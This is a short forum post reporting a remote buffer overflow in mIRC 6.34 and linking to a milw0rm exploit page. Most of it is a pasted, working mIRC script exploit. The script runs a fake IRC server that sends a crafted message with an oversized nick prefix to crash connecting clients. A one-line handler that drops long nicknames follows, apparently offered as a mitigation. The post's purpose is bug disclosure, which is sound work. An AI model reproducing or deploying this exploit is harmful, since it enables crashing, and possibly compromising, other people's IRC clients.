Mirc 6.34 Remote Buffer Overflow - 03/10/08 08:38 AM
Hello, I was just notified of this bug here. Hopefully someone can address it quickly.
http://www.milw0rm.com/exploits/6654
http://www.milw0rm.com/exploits/6654
alias crash { ; check for open sockets if ($sock(crashing*)) { sockclose crashing* echo -sgt Crash-Sockets closed. return } ; determining port var %p = 6667 while (!$portfree(%p) && %p <= 65535) { inc %p } if (%p >= 65536) { echo -sgt ERROR: Socket could not be created. | return } ; listening socklisten crashing %p if (!$sock(crashing)) { echo -sgt ERROR: Socket could not be created. | return } echo -sgt Crash-Socket listening... echo -sgt Type 04/server localhost %p $+ to crash mirc. } on *:socklisten:crashing: { var %s = crashing. $+ $ticks sockaccept %s sockwrite -n %s :irc_server.stuff 001 yow :Welcome to the Internet Relay Network yow sockwrite -n %s $+(:,$str(A,313),CC) PRIVMSG yow : /FINGER yow. echo -sgt Sending crash-message to $sock(%s).ip .timer 1 3 sockclose %s }
on ^*:OPEN:?:*:if ($len($nick) > 298) halt